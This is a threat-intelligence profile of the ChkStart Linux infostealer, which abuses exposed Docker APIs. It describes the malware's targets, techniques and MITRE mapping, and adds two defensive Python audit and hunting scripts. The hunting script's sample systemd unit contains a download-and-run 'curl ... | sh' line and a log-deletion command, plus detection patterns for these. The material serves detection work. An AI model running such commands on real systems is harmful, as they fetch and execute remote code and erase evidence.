ChkStart (Infostealer) – Malware

June 13, 2024
ChkStart

Type of Malware: Infostealer
Country of Origin: Unknown
Date of initial activity: 2024
Targeted Countries: Unknown
Motivation: Data Theft, Financial Gain
Attack Vectors: Credential Based Attacks, Software Vulnerabilities
Targeted Systems: Linux
Type of information Stolen: System Information, Login Credentials, Financial Information

Overview

ChkStart is a Linux malware family whose activity was first reported in 2024. It is built from separable components that the operators can swap or extend, so the same framework is used for everything from basic reconnaissance of a compromised host to data exfiltration, and each component is written to do its job while generating as little evidence as possible.

Its defining trait is evasion of conventional controls. The malware relies on code obfuscation, encryption of its payloads and traffic, and execution through legitimate system processes and services to hide its presence, so defences that only look for the initial dropper, or only inspect network traffic in the clear, tend not to see it.

Targets

  • Docker Engine hosts with the API exposed: the malware looks for hosts listening on TCP port 2375 (the plaintext Docker API port) that are reachable from the internet with no authentication in front of the daemon. This is typically the result of a misconfigured daemon rather than a flaw in Docker itself.
  • Publicly accessible systems: because the API answers to anyone who can reach it, the attackers can drive the Docker engine remotely (create and start containers) without any credentials.
  • Docker environments where the host's root directory can be bound into a container: a container started with the host's / mounted inside it gives the attacker direct read and write access to the host filesystem, which is how they get from the container to the host.
  • Systems suitable for cryptojacking: once on the host, the malware sets up a persistent cryptojacking operation, installing miner payloads that consume the system's CPU to mine cryptocurrency for the attackers.
  • Systems with particular systemd service configurations: systemd services are used as the vector through which the payloads are executed persistently across reboots.
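The two conditions in that list that actually let the attackers in, a plaintext TCP API listener reachable from off-host and a container with the host's root bound inside it, can both be checked offline from configuration and `docker inspect` output. The following Python is an added example written for this page, not code from the page, the referenced reports or the malware; the dockerd command line, daemon.json and inspect records at the bottom are constructed samples, and the loopback list and the decision to treat only `--tlsverify` as clearing a tcp:// listener are the example's own assumptions.

```python
"""Offline audit for the two Docker conditions the campaign above depends on:
a plaintext TCP API listener reachable from off-host, and containers whose bind
mounts expose the host's root filesystem. Added example; not code from the page
or from the malware. Inputs are collected beforehand (dockerd's command line,
daemon.json, `docker inspect` output), so nothing here touches a live daemon."""
import json
import shlex
from urllib.parse import urlsplit

# Assumption: a tcp:// listener bound to one of these is not reachable from off-host.
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def plaintext_api_listeners(dockerd_cmdline: str, daemon_json: str = "{}") -> list[str]:
    """tcp:// listeners the daemon serves without TLS client verification,
    excluding loopback binds. Reads -H/--host from argv and "hosts" from
    daemon.json; --tlsverify (in either place) is the only thing that clears a hit."""
    args = shlex.split(dockerd_cmdline)
    hosts: list[str] = []
    tls_verify = False
    i = 0
    while i < len(args):
        a = args[i]
        if a in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 1  # consume the value
        elif a.startswith(("--host=", "-H=")):
            hosts.append(a.split("=", 1)[1])
        elif a.startswith("-H") and len(a) > 2:  # -Htcp://... (attached form)
            hosts.append(a[2:])
        elif a in ("--tlsverify", "--tlsverify=true"):
            tls_verify = True
        i += 1
    cfg = json.loads(daemon_json or "{}")
    hosts += cfg.get("hosts", [])
    tls_verify = tls_verify or bool(cfg.get("tlsverify"))

    hits = []
    for h in hosts:
        if not h.startswith("tcp://"):
            continue  # unix:// and fd:// are local-only
        host = urlsplit(h).hostname  # None for "tcp://:2375", i.e. all interfaces
        if host in LOOPBACK or tls_verify:
            continue
        hits.append(h)
    return hits


def host_root_containers(inspect_json: str) -> list[dict]:
    """Containers from `docker inspect` that bind-mount the host's / (either a
    HostConfig.Binds entry like "/:/mnt" or a resolved Mounts entry whose Source
    is "/"), with a note of whether they also run privileged."""
    findings = []
    for c in json.loads(inspect_json):
        hc = c.get("HostConfig", {})
        specs = set()
        for b in hc.get("Binds") or []:
            if b.split(":", 1)[0] == "/":
                specs.add(b)
        for m in c.get("Mounts") or []:
            if m.get("Type") == "bind" and m.get("Source") == "/":
                specs.add(f"/:{m.get('Destination')}")
        if specs:
            findings.append({
                "name": c.get("Name", "").lstrip("/"),
                "image": c.get("Config", {}).get("Image"),
                "mounts": sorted(specs),
                "privileged": bool(hc.get("Privileged")),
            })
    return findings


# Constructed samples (not real hosts): one benign container, one matching the
# pattern above (host / mounted at /mnt, privileged). 203.0.113.0/24 is TEST-NET-3.
SAMPLE_CMDLINE = "dockerd -H fd:// -H tcp://0.0.0.0:2375 --containerd=/run/containerd/containerd.sock"
SAMPLE_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock"]}'
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "Config": {"Image": "nginx:1.25"},
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html"}]},
    {"Name": "/zealous_x", "Config": {"Image": "alpine:latest"},
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}]},
])

if __name__ == "__main__":
    print("plaintext API listeners:", plaintext_api_listeners(SAMPLE_CMDLINE, SAMPLE_DAEMON_JSON))
    for f in host_root_containers(SAMPLE_INSPECT):
        print("host root mounted:", f)
```

On a real host, feed it `cat /proc/$(pidof dockerd)/cmdline | tr '\0' ' '`, `/etc/docker/daemon.json` and `docker inspect $(docker ps -aq)`; a hit from the first function means the engine is controllable by anyone who can reach the port, and a hit from the second means the container already has the host's filesystem.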

How they operate

ChkStart runs under the direction of a command and control (C2) server. After execution on a victim host it connects to a server operated by the attackers, pulls further instructions from it and returns stolen data over the same connection, so what it does on a given host, from data collection to system manipulation, is decided by the operators rather than fixed in the binary.

One collection capability the malware is reported to carry is screen capture: it takes screenshots of the victim's desktop and sends them back over the C2 channel, exposing whatever was on screen at the time, including personal and financial details.

It also performs credential dumping, reading stored credentials from the system's own stores (system databases or process memory where secrets sit in plaintext or in a trivially reversible form). Credentials harvested this way are reused to reach further accounts and systems.

For persistence it registers itself to run on a schedule or at system events, so that it survives reboots and user logins and keeps exfiltrating even after the original entry point, such as an exposed Docker API, has been closed. On Linux that typically means cron entries, systemd timers or the systemd services noted under Targets.

For defence evasion it removes or obfuscates logs and other host indicators that would reveal it and alters system settings to the same end, lowering the chance that security tooling or an administrator notices the infection.

MITRE Tactics and Techniques

  • Collection (T1113 – Screen Capture): ChkStart may capture the victim's screen to gather sensitive data displayed on the system.
  • Credential Access (T1003 – OS Credential Dumping): the malware can extract stored credentials from the system using credential dumping techniques.
  • Exfiltration (T1041 – Exfiltration Over C2 Channel): stolen data is typically sent to the attacker's server over the existing command and control channel.
  • Persistence (T1053 – Scheduled Task/Job): scheduled tasks or jobs keep the malware active and operational across reboots.
  • Defense Evasion (T1070 – Indicator Removal): the malware hides its presence or removes traces of its activity from the host to avoid detection and removal.

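The persistence and indicator-removal behaviour described under How they operate and in the T1053 and T1070 entries above can be hunted for on a Linux host by reading the places a scheduled job can live: systemd unit files and crontabs. The Python below is an added example written for this page, not the page's own material and not derived from the malware; the staging-directory list, the regular expressions, the sample units and the crontab lines are all constructed assumptions for illustration, not indicators taken from the referenced reports.

```python
"""Hunting heuristics for Linux persistence (T1053) and indicator removal (T1070)
over systemd unit files and user crontab lines as they would be collected from a
host. Added example, not the page's or the malware's code. All patterns and the
sample data are constructed assumptions, not indicators from any report."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Assumption: payloads staged in these locations are worth a second look.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/root/.cache/")
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")
DECODE_EXEC = re.compile(r"base64\s+(-d|--decode)[^|;]*\|\s*(ba)?sh\b")
LOG_TAMPER = re.compile(
    r"(rm\s+-[a-z]*f[a-z]*\s+\S*/var/log|>\s*/var/log/\S+|truncate\s+-s\s*0\s+\S*/var/log"
    r"|history\s+-c|unset\s+HISTFILE)"
)


@dataclass
class Finding:
    source: str        # unit file name or "crontab"
    command: str       # the command line(s) that triggered it
    reasons: list[str]


def parse_unit(text: str) -> dict[str, dict[str, list[str]]]:
    """Minimal INI parse of a systemd unit: {section: {key: [values]}}.
    Values are lists because keys such as ExecStart may legitimately repeat."""
    sections: dict[str, dict[str, list[str]]] = {}
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            cur = sections.setdefault(line[1:-1], {})
        elif "=" in line and cur is not None:
            k, v = (s.strip() for s in line.split("=", 1))
            cur.setdefault(k, []).append(v)
    return sections


def judge_command(cmd: str) -> list[str]:
    """Reasons a single command line looks like staged or log-tampering execution."""
    reasons = []
    if any(d in cmd for d in STAGING_DIRS):
        reasons.append("executes from a world-writable staging directory")
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("downloads and pipes to a shell")
    if DECODE_EXEC.search(cmd):
        reasons.append("decodes base64 into a shell")
    if LOG_TAMPER.search(cmd):
        reasons.append("tampers with logs or shell history")
    return reasons


def hunt_unit(name: str, text: str) -> Finding | None:
    """Score one unit file; Restart=always/on-failure only matters once something
    else is already suspicious, since plenty of legitimate daemons auto-restart."""
    svc = parse_unit(text).get("Service", {})
    cmds = svc.get("ExecStart", []) + svc.get("ExecStartPre", []) + svc.get("ExecStartPost", [])
    reasons: list[str] = []
    for c in cmds:
        reasons += judge_command(c)
    if reasons and svc.get("Restart", ["no"])[0] in ("always", "on-failure"):
        reasons.append("auto-restarts, so killing the process does not remove it")
    return Finding(name, " ; ".join(cmds), sorted(set(reasons))) if reasons else None


def hunt_crontab(text: str) -> list[Finding]:
    """User-crontab format (5 time fields or an @shortcut, then the command)."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            cmd = line.split(None, 1)[1] if " " in line else ""
        else:
            parts = line.split(None, 5)
            cmd = parts[5] if len(parts) == 6 else ""
        reasons = judge_command(cmd)
        if reasons:
            out.append(Finding("crontab", cmd, reasons))
    return out


def hunt(units: dict[str, str], crontab: str) -> list[Finding]:
    findings = [f for name, text in units.items() if (f := hunt_unit(name, text))]
    return findings + hunt_crontab(crontab)


# Constructed samples: one ordinary service, one that stages a download-and-run
# loop behind a bland name, and a crontab with a job living in /dev/shm.
SAMPLE_UNITS = {
    "sshd.service": "[Unit]\nDescription=OpenBSD Secure Shell server\n\n[Service]\n"
                    "ExecStart=/usr/sbin/sshd -D\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\n",
    "sys-health.service": "[Unit]\nDescription=System health\n\n[Service]\n"
                          "ExecStartPre=/bin/sh -c 'rm -rf /var/log/syslog.1'\n"
                          "ExecStart=/bin/sh -c 'curl -s http://203.0.113.10/x.sh | sh'\n"
                          "Restart=always\n\n[Install]\nWantedBy=multi-user.target\n",
}
SAMPLE_CRONTAB = "# m h dom mon dow command\n0 3 * * * /usr/bin/certbot renew\n*/5 * * * * /dev/shm/.x/run >/dev/null 2>&1\n"

if __name__ == "__main__":
    for f in hunt(SAMPLE_UNITS, SAMPLE_CRONTAB):
        print(f"{f.source}: {f.command}\n    " + "\n    ".join(f.reasons))
```

Point it at `/etc/systemd/system`, `/usr/lib/systemd/system`, `~/.config/systemd/user` and the output of `crontab -l` per user; the heuristics are deliberately narrow, so a clean result means nothing matched these patterns, not that the host is clean.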
References
  • New Malware Targets Exposed Docker APIs for Cryptocurrency Mining
  • Attackers deploying new tactics in campaign targeting exposed Docker APIs
Tags: encryption, infostealer, Malware, obfuscation, Vulnerabilities

    © 2025 | CyberMaterial | All rights reserved